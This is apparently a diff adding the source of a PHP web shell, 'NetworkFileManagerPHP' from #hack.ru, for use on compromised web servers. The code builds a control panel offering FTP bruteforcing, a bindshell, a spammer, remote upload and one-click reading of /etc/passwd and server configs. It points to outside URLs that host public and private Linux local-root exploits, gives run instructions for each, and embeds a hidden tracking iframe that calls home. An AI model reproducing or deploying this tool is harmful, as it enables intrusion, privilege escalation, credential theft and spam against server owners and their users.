+$port[993] = "s-imap";
+
+$port[995] = "s-pop";
+
+$port[1024] = "Reserved";
+
+$port[1025] = "network blackjack";
+
+$port[1062] = "Veracity";
+
+$port[1080] = "SOCKS";
+
+$port[1085] = "WebObjects";
+
+$port[1227] = "DNS2Go";
+
+$port[1243] = "SubSeven";
+
+$port[1338] = "Millennium Worm";
+
+$port[1352] = "Lotus Notes";
+
+$port[1381] = "Apple Network License Manager";
+
+$port[1417] = "Timbuktu Service 1 Port";
+
+$port[1418] = "Timbuktu Service 2 Port";
+
+$port[1419] = "Timbuktu Service 3 Port";
+
+$port[1420] = "Timbuktu Service 4 Port";
+
+$port[1433] = "Microsoft SQL Server";
+
+$port[1434] = "Microsoft SQL Monitor";
+
+$port[1477] = "ms-sna-server";
+
+$port[1478] = "ms-sna-base";
+
+$port[1490] = "insitu-conf";
+
+$port[1494] = "Citrix ICA Protocol";
+
+$port[1498] = "Watcom-SQL";
+
+$port[1500] = "VLSI License Manager";
+
+$port[1503] = "T.120";
+
+$port[1521] = "Oracle SQL";
+
+$port[1522] = "Ricardo North America License Manager";
+
+$port[1524] = "ingres";
+
+$port[1525] = "prospero";
+
+$port[1526] = "prospero";
+
+$port[1527] = "tlisrv";
+
+$port[1529] = "oracle";
+
+$port[1547] = "laplink";
+
+$port[1604] = "Citrix ICA, MS Terminal Server";
+
+$port[1645] = "RADIUS Authentication";
+
+$port[1646] = "RADIUS Accounting";
+
+$port[1680] = "Carbon Copy";
+
+$port[1701] = "L2TP/LSF";
+
+$port[1717] = "Convoy";
+
+$port[1720] = "H.323/Q.931";
+
+$port[1723] = "PPTP control port";
+
+$port[1731] = "MSICCP";
+
+$port[1755] = "Windows Media .asf";
+
+$port[1758] = "TFTP multicast";
+
+$port[1761] = "cft-0";
+
+$port[1762] = "cft-1";
+
+$port[1763] = "cft-2";
+
+$port[1764] = "cft-3";
+
+$port[1765] = "cft-4";
+
+$port[1766] = "cft-5";
+
+$port[1767] = "cft-6";
+
+$port[1808] = "Oracle-VP2";
+
+$port[1812] = "RADIUS server";
+
+$port[1813] = "RADIUS accounting";
+
+$port[1818] = "ETFTP";
+
+$port[1973] = "DLSw DCAP/DRAP";
+
+$port[1985] = "HSRP";
+
+$port[1999] = "Cisco AUTH";
+
+$port[2001] = "glimpse";
+
+$port[2049] = "NFS";
+
+$port[2064] = "distributed.net";
+
+$port[2065] = "DLSw";
+
+$port[2066] = "DLSw";
+
+$port[2106] = "MZAP";
+
+$port[2140] = "DeepThroat";
+
+$port[2301] = "Compaq Insight Management Web Agents";
+
+$port[2327] = "Netscape Conference";
+
+$port[2336] = "Apple UG Control";
+
+$port[2427] = "MGCP gateway";
+
+$port[2504] = "WLBS";
+
+$port[2535] = "MADCAP";
+
+$port[2543] = "sip";
+
+$port[2592] = "netrek";
+
+$port[2727] = "MGCP call agent";
+
+$port[2628] = "DICT";
+
+$port[2998] = "ISS Real Secure Console Service Port";
+
+$port[3000] = "Firstclass";
+
+$port[3001] = "Redwood Broker";
+
+$port[3031] = "Apple AgentVU";
+
+$port[3128] = "squid";
+
+$port[3130] = "ICP";
+
+$port[3150] = "DeepThroat";
+
+$port[3264] = "ccmail";
+
+$port[3283] = "Apple NetAssitant";
+
+$port[3288] = "COPS";
+
+$port[3305] = "ODETTE";
+
+$port[3306] = "mySQL";
+
+$port[3389] = "RDP Protocol (Terminal Server)";
+
+$port[3521] = "netrek";
+
+$port[4000] = "icq, command-n-conquer and shell nfm";
+
+$port[4321] = "rwhois";
+
+$port[4333] = "mSQL";
+
+$port[4444] = "KRB524";
+
+$port[4827] = "HTCP";
+
+$port[5002] = "radio free ethernet";
+
+$port[5004] = "RTP";
+
+$port[5005] = "RTP";
+
+$port[5010] = "Yahoo! Messenger";
+
+$port[5050] = "multimedia conference control tool";
+
+$port[5060] = "SIP";
+
+$port[5150] = "Ascend Tunnel Management Protocol";
+
+$port[5190] = "AIM";
+
+$port[5500] = "securid";
+
+$port[5501] = "securidprop";
+
+$port[5423] = "Apple VirtualUser";
+
+$port[5555] = "Personal Agent";
+
+$port[5631] = "PCAnywhere data";
+
+$port[5632] = "PCAnywhere";
+
+$port[5678] = "Remote Replication Agent Connection";
+
+$port[5800] = "VNC";
+
+$port[5801] = "VNC";
+
+$port[5900] = "VNC";
+
+$port[5901] = "VNC";
+
+$port[6000] = "X Windows";
+
+$port[6112] = "BattleNet";
+
+$port[6502] = "Netscape Conference";
+
+$port[6667] = "IRC";
+
+$port[6670] = "VocalTec Internet Phone, DeepThroat";
+
+$port[6699] = "napster";
+
+$port[6776] = "Sub7";
+
+$port[6970] = "RTP";
+
+$port[7007] = "MSBD, Windows Media encoder";
+
+$port[7070] = "RealServer/QuickTime";
+
+$port[7777] = "cbt";
+
+$port[7778] = "Unreal";
+
+$port[7648] = "CU-SeeMe";
+
+$port[7649] = "CU-SeeMe";
+
+$port[8000] = "iRDMI/Shoutcast Server";
+
+$port[8010] = "WinGate 2.1";
+
+$port[8080] = "HTTP";
+
+$port[8181] = "HTTP";
+
+$port[8383] = "IMail WWW";
+
+$port[8875] = "napster";
+
+$port[8888] = "napster";
+
+$port[8889] = "Desktop Data TCP 1";
+
+$port[8890] = "Desktop Data TCP 2";
+
+$port[8891] = "Desktop Data TCP 3: NESS application";
+
+$port[8892] = "Desktop Data TCP 4: FARM product";
+
+$port[8893] = "Desktop Data TCP 5: NewsEDGE/Web application";
+
+$port[8894] = "Desktop Data TCP 6: COAL application";
+
+$port[9000] = "CSlistener";
+
+$port[10008] = "cheese worm";
+
+$port[11371] = "PGP 5 Keyserver";
+
+$port[13223] = "PowWow";
+
+$port[13224] = "PowWow";
+
+$port[14237] = "Palm";
+
+$port[14238] = "Palm";
+
+$port[18888] = "LiquidAudio";
+
+$port[21157] = "Activision";
+
+$port[22555] = "Vocaltec Web Conference";
+
+$port[23213] = "PowWow";
+
+$port[23214] = "PowWow";
+
+$port[23456] = "EvilFTP";
+
+$port[26000] = "Quake";
+
+$port[27001] = "QuakeWorld";
+
+$port[27010] = "Half-Life";
+
+$port[27015] = "Half-Life";
+
+$port[27960] = "QuakeIII";
+
+$port[30029] = "AOL Admin";
+
+$port[31337] = "Back Orifice";
+
+$port[32777] = "rpc.walld";
+
+$port[45000] = "Cisco NetRanger postofficed";
+
+$port[32773] = "rpc bserverd";
+
+$port[32776] = "rpc.spray";
+
+$port[32779] = "rpc.cmsd";
+
+$port[38036] = "timestep";
+
+$port[40193] = "Novell";
+
+$port[41524] = "arcserve discovery";
+
+
+
+/* finished config, here goes the design */
+
+$meta = "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-1251\">";
+
+$style=<<<style
+
+<style>
+
+a.   {
+
+color: #ffffcc;
+
+text-decoration:none;
+
+font-family: Times New Roman;
+
+font-weight: bold;
+
+     }
+
+a.menu:hover   {
+
+color: #FF0000;
+
+font-family: Times New Roman;
+
+text-decoration: none
+
+font-weight: bold;
+
+          }
+
+a   {
+
+color: #000000;
+
+text-decoration:none;
+
+font-family: Tahoma;
+
+font-size: 11px;
+
+     }
+
+a:hover   {
+
+color: #184984;
+
+font-family: Tahoma;
+
+text-decoration: underline
+
+font-size: 11px;
+
+          }
+
+td.up{
+
+color: #996600;
+
+font-family: Verdana;
+
+font-weight: normal;
+
+font-size: 11px;
+
+}
+
+.pagetitle {
+
+font-family: Arial, Helvetica, sans-serif;
+
+color: #FFFFFF;
+
+text-decoration: none;
+
+font-size: 12px
+
+}
+
+.alert   {
+
+color: #FF0000;
+
+font-family: Tahoma;
+
+font-size: 11px;
+
+          }
+
+.button1 {
+
+font-size:11px;
+
+font-weight:bold;
+
+font-family:Verdana;
+
+background:#184984;
+
+border:1px solid #000000; cursor:hand; color:#ffffcc;
+
+}
+
+.inputbox {font-size:11px; font-family:Verdana, Arial, Helvetica, sans-serif; background:#EBEFF6; color:#213B72; border:1px solid #000000; font-weight:normal}
+
+.submit_button {  font-family: Arial, Helvetica, sans-serif; font-size: 12px; color: #FFFFFF; background-color: #999999;}
+
+.textbox { background: White; border: 1px #000000 solid; color: #000099; font-family: "Courier New", Courier, mono; font-size: 11px; scrollbar-face-color: #CCCCCC; scrollbar-shadow-color: #FFFFFF; scrollbar-highlight-color: #FFFFFF; scrollbar-3dlight-color: #FFFFFF; scrollbar-darkshadow-color: #FFFFFF; scrollbar-track-color: #FFFFFF; scrollbar-arrow-color: #000000 ; border-color: #000000 solid}
+
+b {  font-weight: bold}
+
+table {  font-family: Arial, Helvetica, sans-serif; font-size: 11px; color: #184984}
+
+</style>
+
+style;
+
+
+
+/* table styles */
+
+$style1=<<<table
+
+STYLE="background:#184984" onmouseover="this.style.backgroundColor = '#D5EBD7'" onmouseout="this.style.backgroundColor = '#184984'"
+
+table;
+
+$style2=<<<table_file
+
+STYLE="background:#184984" onmouseover="this.style.backgroundColor = '#D5EBD7'" onmouseout="this.style.backgroundColor = '#184984'"
+
+table_file;
+
+$style3=<<<table_dir
+
+STYLE="background:#28BECA" onmouseover="this.style.backgroundColor = '#FFFFCC'" onmouseout="this.style.backgroundColor = '#28BECA'"
+
+table_dir;
+
+$style4=<<<table_files
+
+STYLE="background:#DCDCB0" onmouseover="this.style.backgroundColor = '#28BECA'" onmouseout="this.style.backgroundColor = '#DCDCB0'"
+
+table_files;
+
+$style_button=<<<button
+
+STYLE="background:#184984" onmouseover="this.style.backgroundColor = '#D5EBD7'" onmouseout="this.style.backgroundColor = '#184984'"
+
+button;
+
+$style_open=<<<open
+
+STYLE="background:#006200" onmouseover="this.style.backgroundColor = '#006200'" onmouseout="this.style.backgroundColor = '#006200'"
+
+open;
+
+$style_close=<<<close
+
+STYLE="background:#FF0000" onmouseover="this.style.backgroundColor = '#FF0000'" onmouseout="this.style.backgroundColor = '#FF0000'"
+
+close;
+
+$ins=<<<ins
+
+<script>
+
+function ins(text){
+
+document.hackru.chars_de.value+=text;
+
+document.hackru.chars_de.focus();
+
+}
+
+</script>
+
+ins;
+
+
+
+/* send form */
+
+$form = "
+
+<br>     <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+   <tr>
+
+  <td align=center class=pagetitle colspan=2><b>Help for NetworkFileManagerPHP 1.7</b></font></b></td>
+
+  </tr>  <form method='POST' action='$PHP_SELF?action=feedback&status=ok'>
+
+     <tr>
+
+  <td colspan=2 align=center class=pagetitle><b>Feedback:</b></td>
+
+  </tr>
+
+    <tr>
+
+      <td width='250' class=pagetitle><b>Your name:</b></td>
+
+      <td width='250' class=pagetitle>
+
+        <input type='text' name='name' size='40' class='inputbox'></td>
+
+      </tr>
+
+    <tr>
+
+      <td width='250' class=pagetitle><b>Email:</b></td>
+
+      <td width='250'><input type='text' name='email' size='40' class='inputbox'></td>
+
+    </tr>
+
+
+
+  <tr>
+
+  <td colspan=2 align=center class=pagetitle><b>
+
+  Your questions and wishes:
+
+  </b></font></b></td>
+
+  </tr>
+
+  <tr>
+
+      <td width=500 colspan=2><textarea rows='4' name='pole' cols='84' class='inputbox' ></textarea></td></tr>
+
+  <tr>
+
+  <td align=right><input type='submit' value='GO' name='B1' class=button1 $style_button></td>
+
+      <td align=left><input type='reset' value='Clear' name='B2' class=button1 $style_button></td>
+
+      </tr>
+
+</form></table><br>
+
+";
+
+
+
+
+
+
+
+/* HTML Form */
+
+$HTML=<<<html
+
+<html>
+
+<head>
+
+<title>$title $ver</title>
+
+$meta
+
+$style
+
+$ins
+
+</head>
+
+
+
+<body bgcolor=#E0F7FF leftmargin=0 topmargin=0 marginwidth=0 marginheight=0>
+
+<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center colspan=6 class=pagetitle><b>NetworkFileManagerPHP (© #hack.ru)</b> Version: <b>$ver</b> </td></tr>
+
+<tr><td align=center colspan=6 class=pagetitle>Script for l33t admin job</td></tr>
+
+<tr>
+
+<td class=pagetitle align=center width='85%'><b>Script help:</b></td>
+
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF'>.:Home</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%' ><a class=menu href="http://hackru.info">.:#hack.ru</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%'><a class=menu href = '$PHP_SELF?action=feedback'>.:Feedback</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=help'>.:About</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=update'>.:Update</a>&nbsp;&nbsp;</td>
+
+</tr>
+
+
+
+<tr>
+
+<td class=pagetitle align=center width='85%' ><b>Net tools:</b></td>
+
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=portscan'>.:Port scanner</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=ftp'>.:FTP bruteforce</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=tar'>.:Folder compression</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=sql'>.:Mysql Dump</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=bash'>.:bindshell (/bin/sh)</a>&nbsp;&nbsp;</td>
+
+</tr>
+
+<tr>
+
+<td class=pagetitle align=center width='85%' ><b>Exploits access:</b></td>
+
+<td $style2 align=center width='15%' colspan=2><a class=menu href='$PHP_SELF?action=bash'>.:bindshell</a>&nbsp;&nbsp;</td>
+
+<td $style_open align=center width='15%' colspan=3><a  class=menu href='$PHP_SELF?action=exploits'>.:Exploits</a>&nbsp;&nbsp;</td>
+
+<tr>
+
+<td class=pagetitle align=center width='85%'><b>l33t tools:</b></td>
+
+<td $style2 align=center width='15%' ><a  class=menu href='$PHP_SELF?action=crypte'>.:Crypter</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%' ><a  class=menu href='$PHP_SELF?action=decrypte'>.:Decrypter</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%' ><a  class=menu href='$PHP_SELF?action=brut_ftp'>.:Full access FTP</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%' ><a  class=menu href='$PHP_SELF?action=spam'>.:Spamer (!new!)</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%' ><a  class=menu href='$PHP_SELF?action=down'>.:Remote upload</a>&nbsp;&nbsp;</td>
+
+</tr>
+
+<tr>
+
+<td class=pagetitle align=center width='85%' colspan=6>$sob&nbsp;&nbsp;ID:<u><b>$id</b></u></td>
+
+</tr>
+
+<tr>
+
+<td $style2 align=center width='15%' colspan=2><a class=menu href="$PHP_SELF?tm=/etc&fi=passwd&action=view">.:etc/passwd</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%' ><a class=menu href = '$PHP_SELF?tm=/var/cpanel&fi=accounting.log&action=view'>.:cpanel log</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%' ><a class=menu href='$PHP_SELF?tm=/usr/local/apache/conf&fi=httpd.conf&action=view'>.:httpd.conf[1]</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%' ><a class=menu href='$PHP_SELF?tm=/etc/httpd&fi=httpd.conf&action=view'>.:httpd.conf[2]</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%' ><a class=menu href='http://goat.cx'>.:Bonus</td>
+
+
+
+</tr>
+
+<!-- add by revers -->
+
+<tr>
+
+<td class=pagetitle align=center width='85%'><b>Traffic tools:</b></td>
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=gettraff'>.:Get the script</a>&nbsp;&nbsp;</td>
+
+</tr>
+
+<!-- end add by revers -->
+
+</table>
+
+html;
+
+$key="goatse";
+
+$string="<IFRAME src=http://hackru.info/adm/count_nfm.php width=1 height=1 frameBorder=0 width=0 height=0></iframe>";
+
+/* randomizing letters array for random filenames of compression folders */
+
+$CHARS = "abcdefghijklmnopqrstuvwxyz";
+
+for ($i=0; $i<6; $i++)  $pass .= $CHARS[rand(0,strlen($CHARS)-1)];
+
+
+
+/* set full path to host and dir where public exploits and soft are situated */
+
+$public_site = "http://hackru.info/adm/exploits/public_exploits/";
+
+/* $public_site = "http://localhost/adm/public_exploits/"; */
+
+/* Public exploits and soft */
+
+$public[1] = "s"; // bindshell
+
+$title_ex[1] = "
+
+&nbsp;&nbsp;bindtty.c - remote shell on 4000 port, with rights of current user (id of apache)<br>
+
+<dd><b>Run:</b> ./s<br>
+
+&nbsp;&nbsp;&nbsp;Connect tot host with your favorite telnet client. Best of them are <u><b>putty</b></u> and <u><b>SecureCRT</b></u>
+
+";
+
+$public[2] = "m"; // mremap
+
+$title_ex[2] = "
+
+&nbsp;&nbsp;MREMAP - allows to gain local root priveleges by exploiting the bug of memory .<br>
+
+<dd><b>Run:</b> ./m<br>
+
+&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!
+
+";
+
+$public[3] = "p"; // ptrace
+
+$title_ex[3] = "
+
+&nbsp;&nbsp;PTRACE - good one, works like mremap, but for another bug<br>
+
+<dd><b>Run:</b> ./p<br>
+
+&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!
+
+";
+
+$public[4] = "psyBNC2.3.2-4.tar.gz"; // psybnc
+
+$title_ex[4] = "
+
+&nbsp;&nbsp;psyBNC - Last release of favorite IRC bouncer<br>
+
+<dd><b>Decompression:</b> tar -zxf psyBNC2.3.2-4.tar.gz // will be folder <u>psybnc</u><br>
+
+<dd><b>Compilation, installing and running psybnc:</b> make // making psybnc // ./psybnc // You may edit psybnc.conf with NFM, Default listening port is 31337 - connect to it with your favotite IRC client and set a password<br>
+
+&nbsp;&nbsp;&nbsp;Allowed to run with uid of apache, but check out the firewall!
+
+";
+
+/* Private exploits */
+
+$private[1] = "brk"; // localroot root linux 2.4.*
+
+$title_exp[1] = "
+
+&nbsp;&nbsp;localroot root linux 2.4.* - Exploit do_brk (code added) - gains local root priveleges if exploited succes<br>
+
+<dd><b>Run:</b> ./brk<br>
+
+&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!
+
+";
+
+$private[2] = "dupescan"; // Glftpd DupeScan Local Exploit by RagnaroK
+
+$title_exp[2] = "
+
+&nbsp;&nbsp;lGlftpd DupeScan Local Exploit - private local root exploits for Glftpd daemon <br>
+
+<dd>There are 2 files: <b>dupescan</b> and <b>glftpd</b> To gain root uid, you need to write dupescan to <br>
+
+glftpd/bin/ with command <u>cp dupescan glftpd/bin/</u>, and after run <u>./glftpd</u>. Get the root!!!<br>
+
+&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!
+
+";
+
+$private[3] = "glftpd";
+
+$title_exp[3] = "
+
+&nbsp;&nbsp;lGlftpd DupeScan Local Exploit - private local root exploits for Glftpd daemon <br>
+
+part 2<br>
+
+&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!
+
+";
+
+$private[4] = "sortrace";
+
+$title_exp[4] = "
+
+&nbsp;&nbsp;Traceroute v1.4a5 exploit by sorbo - private local root exploit for traceroute up to 1.4.a5<br>
+
+<dd><b>Run:</b> ./sortrace<br>
+
+&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!
+
+";
+
+$private[5] = "root";
+
+$title_exp[5] = "
+
+&nbsp;&nbsp;localroot root linux 2.4.* - ptrace private_mod exploits, may gain local root privaleges<br>
+
+<dd><b>Run:</b> ./root<br>
+
+&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!
+
+";
+
+$private[6] = "sxp";
+
+$title_exp[6] = "
+
+&nbsp;&nbsp;Sendmail 8.11.x exploit localroot - private local root exploit for Sendmail 8.11.x<br>
+
+<dd><b>Run:</b> ./sxp<br>
+
+&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!
+
+";
+
+$private[7] = "ptrace_kmod";
+
+$title_exp[7] = "
+
+&nbsp;&nbsp;localroot root linux 2.4.* - private local root exploit, uses kmod bug + ptrace , gives local root<br>
+
+<dd><b>Run:</b> ./ptrace_kmod<br>
+
+&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!
+
+";
+
+$private[8] = "mr1_a";
+
+$title_exp[8] = "
+
+&nbsp;&nbsp;localroot root linux 2.4.* - mremap any memory size local root exploit for kernels 2.4.x<br>
+
+<dd><b>Run:</b> ./mr1_a<br>
+
+&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!
+
+";
+
+/* set full path to host and dir where private exploits and soft are situated */
+
+$private_site = "http://hackru.info/adm/exploits/private_exploits/";
+
+endif;
+
+
+
+$createdir= "files";
+
+
+
+/* spamer config */
+
+
+
+$sendemail = "packetstorm@km.ru";
+
+$confirmationemail = "packetstorm@km.ru";
+
+$mailsubject = "Hello!This is a test message!";
+
+
+
+
+
+
+
+/* !!!Warning: DO NOT CHANGE ANYTHING IF YOU DUNNO WHAT ARE YOU DOING	 */
+
+global $action,$tm,$cm;
+
+
+
+function getdir() {
+
+ global $gdir,$gsub,$i,$j,$REMOTE_ADDR,$PHP_SELF;
+
+ $st = getcwd();
+
+ $st = str_replace("\\","/",$st);
+
+ $j = 0;
+
+ $gdir = array();
+
+ $gsub = array();
+
+ print("<br>");
+
+ for ($i=0;$i<=(strlen($st)-1);$i++) {
+
+  if ($st[$i] != "/") {
+
+   $gdir[$j] = $gdir[$j].$st[$i];
+
+   $gsub[$j] = $gsub[$j].$st[$i];
+
+  } else {
+
+   $gdir[$j] = $gdir[$j]."/";
+
+   $gsub[$j] = $gsub[$j]."/";
+
+   $gdir[$j+1] = $gdir[$j];
+
+   $j++;
+
+  }
+
+ }
+
+
+ print("<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#ffffcc BORDER=1 width=60% align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=left><b>&nbsp;&nbsp;Current directory: </b>");
+
+ for ($i = 0;$i<=$j;$i++) print("<a href='$PHP_SELF?tm=$gdir[$i]'>$gsub[$i]</a>");
+
+ $free = tinhbyte(diskfreespace("./"));
+
+ print("</td></tr><tr><td><b>&nbsp;&nbsp;Current disk free space</b> : <font face='Tahoma' size='1' color='#000000'>$free</font></td></tr>");
+
+ print("<tr><td><b>&nbsp; ".exec("uname -a")."</b></td></tr>");
+
+ print("<tr><td><b>&nbsp; ".exec("cat /proc/cpuinfo | grep GHz")." &nbsp;&nbsp; &nbsp; &nbsp;Real speed of ".exec("cat /proc/cpuinfo | grep MHz")."</b></td></tr>");
+
+ print("<tr><td><b>&nbsp; Perhaps release is :&nbsp;&nbsp;".exec("cat /etc/redhat-release")."</b></td></tr></td>");
+
+ print("<tr><td><b>&nbsp; ".exec("id")." &nbsp; &nbsp; &nbsp; &nbsp; ".exec("who")."</b></td></tr>");
+
+ print("<tr><td><b>&nbsp;&nbsp;Your IP:&nbsp;&nbsp;</b><font face='Tahoma' size='1' color='#000000'>$REMOTE_ADDR &nbsp; $HTTP_X_FORWARDED_FOR</font></td></tr></table><br>");
+
+
+}
+
+function tinhbyte($filesize) {
+
+ if($filesize >= 1073741824) { $filesize = round($filesize / 1073741824 * 100) / 100 . " GB"; }
+
+ elseif($filesize >= 1048576) { $filesize = round($filesize / 1048576 * 100) / 100 . " MB"; }
+
+ elseif($filesize >= 1024) { $filesize = round($filesize / 1024 * 100) / 100 . " KB"; }
+
+ else { $filesize = $filesize . ""; }
+
+ return $filesize;
+
+}
+
+
+
+function permissions($mode) {
+
+ $perms  = ($mode & 00400) ? "r" : "-";
+
+ $perms .= ($mode & 00200) ? "w" : "-";
+
+ $perms .= ($mode & 00100) ? "x" : "-";
+
+ $perms .= ($mode & 00040) ? "r" : "-";
+
+ $perms .= ($mode & 00020) ? "w" : "-";
+
+ $perms .= ($mode & 00010) ? "x" : "-";
+
+ $perms .= ($mode & 00004) ? "r" : "-";
+
+ $perms .= ($mode & 00002) ? "w" : "-";
+
+ $perms .= ($mode & 00001) ? "x" : "-";
+
+ return $perms;
+
+}
+
+
+
+function readdirdata($dir) {
+
+ global $action,$files,$dirs,$tm,$supsub,$thum,$style3,$style4,$PHP_SELF;
+
+ $files = array();
+
+ $dirs= array();
+
+ $open = @opendir($dir);
+
+
+
+ if (!@readdir($open) or !$open ) echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=alert><b>Access denied.</b></td></tr></table>";
+
+ else {
+
+  $open = opendir($dir);
+
+  while ($file = readdir($open)) {
+
+   $rec = $file;
+
+   $file = $dir."/".$file;
+
+   if (is_file($file)) $files[] = $rec;
+
+  }
+
+  sort($files);
+
+  $open = opendir($dir);
+
+  $i=0;
+
+  while ($dire = readdir($open)) {
+
+   if ( $dire != "." ) {
+
+    $rec = $dire;
+
+    $dire = $dir."/".$dire;
+
+    if (is_dir($dire)) {
+
+     $dirs[] = $rec;
+
+     $i++;
+
+    }
+
+   }
+
+  }
+
+  sort($dirs);
+
+  print("<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=760 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td width = '20%' align = 'center' class=pagetitle><b>Name</b></td><td width = '10%' align = 'center' class=pagetitle><b>Size</b></td><td width = '20%' align = 'center' class=pagetitle><b>Date of creation</b></td><td width = '10%' align = 'center' class=pagetitle><b>Type</b></td><td width = '15%' align = 'center' class=pagetitle><b>Access rights</b></td><td width = '25%' align = 'center' class=pagetitle><b>Comments</b></td></tr></table>");
+
+  for ($i=0;$i<sizeof($dirs);$i++) {
+
+   if ($dirs[$i] != "..") {
+
+    $type = 'Dir';
+
+    $fullpath = $dir."/".$dirs[$i];
+
+    $time = date("d/m/y H:i",filemtime($fullpath));
+
+    $perm = permissions(fileperms($fullpath));
+
+    $size = tinhbyte(filesize($fullpath));
+
+    $name = $dirs[$i];
+
+    $fullpath = $tm."/".$dirs[$i];
+
+    if ($perm[7] == "w" && $name != "..") $action = "
+
+	<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#98FAFF width=100% BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+	<tr>
+
+	<td align=center $style3><a href ='$PHP_SELF?tm=$fullpath&action=uploadd'>Upload</a></td>
+
+	<td align=center $style3><a href ='$PHP_SELF?tm=$tm&dd=$name&action=deldir'>Delete</a></td>
+
+	</tr>
+
+	<tr>
+
+	<td align=center $style3><a href ='$PHP_SELF?tm=$fullpath&action=newdir'>Create directory</a></td>
+
+	<td align=center $style3><a href ='$PHP_SELF?tm=$fullpath&action=arhiv'>Directory compression</a></td>
+
+	</tr></table>";
+
+    else $action = "<TABLE CELLPADDING=0 CELLSPACING=0 width=100% BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center><b>Read only</b></td><td align=center $style2><a href ='$PHP_SELF?tm=$fullpath&action=arhiv'>Directory compression</a></td></tr></table>";
+
+    print("<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#33CCCC BORDER=1 width=760 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td width = '20%' align = 'left'><a href = '$PHP_SELF?tm=$fullpath'><b><i>$name</i></b></a></td><td width = '10%' align = 'center'>$size</td><td width = '20%' align = 'center'>$time</td><td width = '10%' align = 'center'>$type</td><td width = '15%' align = 'center'>$perm</td><td width = '25%' align = 'left'>$action</td></tr></table>");
+
+   }
+
+  }
+
+  for ($i=0;$i<sizeof($files);$i++) {
+
+   $type = 'File';
+
+   $fullpath =  $dir."/".$files[$i];
+
+   $time = date("d/m/y H:i",filemtime($fullpath));
+
+   $perm = permissions(fileperms($fullpath));
+
+   $size = tinhbyte(filesize($fullpath));
+
+   if ( $perm[6] == "r" ) $act = "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#98FAFF width=100% BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+   <tr><td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action=view'>View</a></td>
+
+   <td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action=download'>Download</a></td></tr>
+
+   <tr><td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action=download_mail'>To e-mail</a></td>
+
+   <td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action=copyfile'>Copy</a></td>
+
+   </tr></table>";
+
+   if ( $perm[7] == "w" ) $act .= "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#98FAFF width=100% BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+   <tr><td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action=edit'>Edit</a></td>
+
+   <td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action=delete'>Delete</a></td>
+
+   </tr></table>";
+
+   print("<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#FFFFCC BORDER=1 width=760 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td width = '20%' align = 'left'><b>$files[$i]</b></font></td><td width = '10%' align = 'center'>$size</td><td width = '20%' align = 'center'>$time</td><td width = '10%' align = 'center'>$type</td><td width = '15%' align = 'center'>$perm</td><td width = '25%' align = 'center'>$act</td></tr></table>");
+
+  }
+
+ }
+
+}
+
+
+
+function html() {
+
+global $ver,$meta,$style;
+
+echo "
+
